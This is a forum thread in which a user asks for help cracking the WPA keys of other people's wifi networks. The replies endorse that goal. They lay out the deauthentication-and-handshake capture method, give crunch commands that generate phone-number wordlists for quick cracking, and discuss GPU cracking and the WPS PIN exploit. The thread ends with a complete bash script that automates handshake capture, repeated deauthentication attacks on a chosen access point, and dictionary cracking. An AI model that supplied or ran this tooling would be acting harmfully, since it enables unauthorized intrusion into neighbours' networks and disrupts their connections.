how to create a WPA password finder

[XBlackHatX]

hi guys im new and i have some basic [/size]knowledge[/size] of python 2.7 and javascript i was wondering if anyone could help me make something that could find the security key to [/size]access[/size] other peoples internet.


if you have a lot of information we could communicate through email thank you to everyone that posts.


 

[/size]mailto:xblackhatx@y7mail.com
call me Bob


thankyou

[relax]

well there is already a lot of great tools for that but if you want to make your own the first stepp would be to understand how the wifi works, write a program to capture data, learn what all the data recived is, learn injection, learn different types of security algoritsm

[m@dz3r0ne]

I agree with relax. There are already many great tools out there! But anyway.. With basic knowledge of python you can't write such programs.

http://oss.coresecurity.com/projects/pcapy.html

[bubzuru]

the only way to crack WPA2 is with a WPS exploit (if WPS is enabled)
use an existing tool because i dont think python and java will do what you need

[relax]

the only way to crack WPA2 is with a WPS exploit (if WPS is enabled)
use an existing tool because i dont think python and java will do what you need

nah you can get a handshake to and run it thru a dictionary.
you monitor a ap see if anyone is connected if there is you send a deauthication witch forces the one connected to send the key to connect again when they do you grab the key and try to crack it ^^

aircrack-ng have that function, its the fastest way to get the password if its in your word list.

[TRAiN3R]

/pentest/passwords/crunch/./crunch 10 10 -t %%%%%%%%%% -o 10digitwordlist.txt

Crunch can also do a lot more then that btw for example:
/pentest/passwords/crunch/./crunch 10 10 -t 000%%%%%%% -o 000wordlist.txt

In that example it uses 000 then 7 numbers. This is because more recently a lot of people use their phone numbers and if you know the area code you can quickly break into systems and within an hour on a crappy computer or a few seconds utilizing a GPU core on your video card.

I use pyrit with my word list after setting up my laptop with OpenCL I get about 2500 k/s (not bad for a dual core laptop, with just the 2 cpus I was getting 300k/s)

You can follow my tutorial to getting a wpa handshake (for cracking):
http://evilzone.org/tutorials/wpa-cracking-with-backtrack-5/

[bubzuru]

personally i dont like dictionary's, people have started using decent passwords
and i have a real old, shitty laptop (like 0.9 GHz) i need $$$$$$

[Conch]

Breaking through the WPS barrier with its vulnerability is the best way on a slow laptop.
I have a 2.2 Ghz laptop myself and was able to retrieve a 100% working WPA PSK key in a matter of 12 hours.

If you have a fast machine, go for Bruteforce or dictionary attack but WPS is far more efficient IMO on a network AP that doesn't have too many lock outs.

[relax]

well you can allways use hashcat to break the password if you have a handshake
its much faster, using the gpu also

the smart think is to first run the handshake/password thru a good dictionary before a bruteforce
 

edit: yeah while you brutforce you sould crack the wps if its enabled that way if your bf fails (or the key is to long) you still get the key
and the +side with wps is that after you got the pin it dossent matter how many times they change password you will get the new in a matter of secounds. the only thing they can do is to turn the wps off

[frog]

Here's a script I made to help capture a WPA handshake; then use one of the tools mentioned above to crack the hash. GPU support will be your saving grace..

Code: (bash) [Select]

#!/bin/bash
##
### Script to help capture wpa-handshake(run this as ROOT)
## Note: make sure aircrack-ng and xterm are installed before you run
#

export IFACE
export BSSID
export CHANNEL
export TIME # time between deauth. broadcast
export CLIENT # client to deauth. (optional)

### Check for argument
if [ -z $1 ]
  then echo "Usage: $0 <interface>"
  echo "Set MONITOR mode interface."
  exit
fi

if [ -z `which xterm` ]
  then echo "xterm is not installed, exiting."
  exit
fi

if [ -z `which aircrack-ng` ]
  then echo "aircrack-ng is not installed, exiting."
  exit
fi

### Start airodump-ng to collect target information
IFACE=$1
airodump-ng $IFACE
echo "### TARGET INFORMATION ###"
echo "Enter BSSID: "; read BSSID
echo "Enter AP Channel: "; read CHANNEL
echo "Enter deauth. delay: "; read TIME
echo "Enter client(optional): "; read CLIENT
echo "Starting $0 with these parameters: "
echo "   Interface: $IFACE"; sleep 1
echo "       BSSID: $BSSID"; sleep 1
echo "     Channel: $CHANNEL"; sleep 1
echo "  Time Delay: $TIME"; sleep 1

if [ "$CLIENT" != "" ]
  then echo "      Client: $CLIENT"; sleep 1
fi

### Start capture and regular deauth.
# Start airodump-ng to capture handshake
xterm -e "airodump-ng --bssid $BSSID --channel $CHANNEL -w WPA-HS $IFACE" &

# Start deauth every x minutes
sleep 3 # wait for airodump to startup

if [ "$CLIENT" != "" ]
  then xterm -e "while true; do aireplay-ng -0 9 $IFACE -a $BSSID -c $CLIENT; echo 'Sleeping for $TIME seconds'; sleep $TIME; done" &
fi

if [ "$CLIENT" = "" ]
  then xterm -e "while true; do  aireplay-ng -0 9 $IFACE -a $BSSID; echo 'Sleeping for $TIME second(s)'; sleep $TIME; done" &
fi

# Start aircrack-ng in wpa mode to parse the .cap file for handshakes
while true; do aircrack-ng -a 2 WPA*.cap -w /usr/share/dict/american-english; sleep 30; done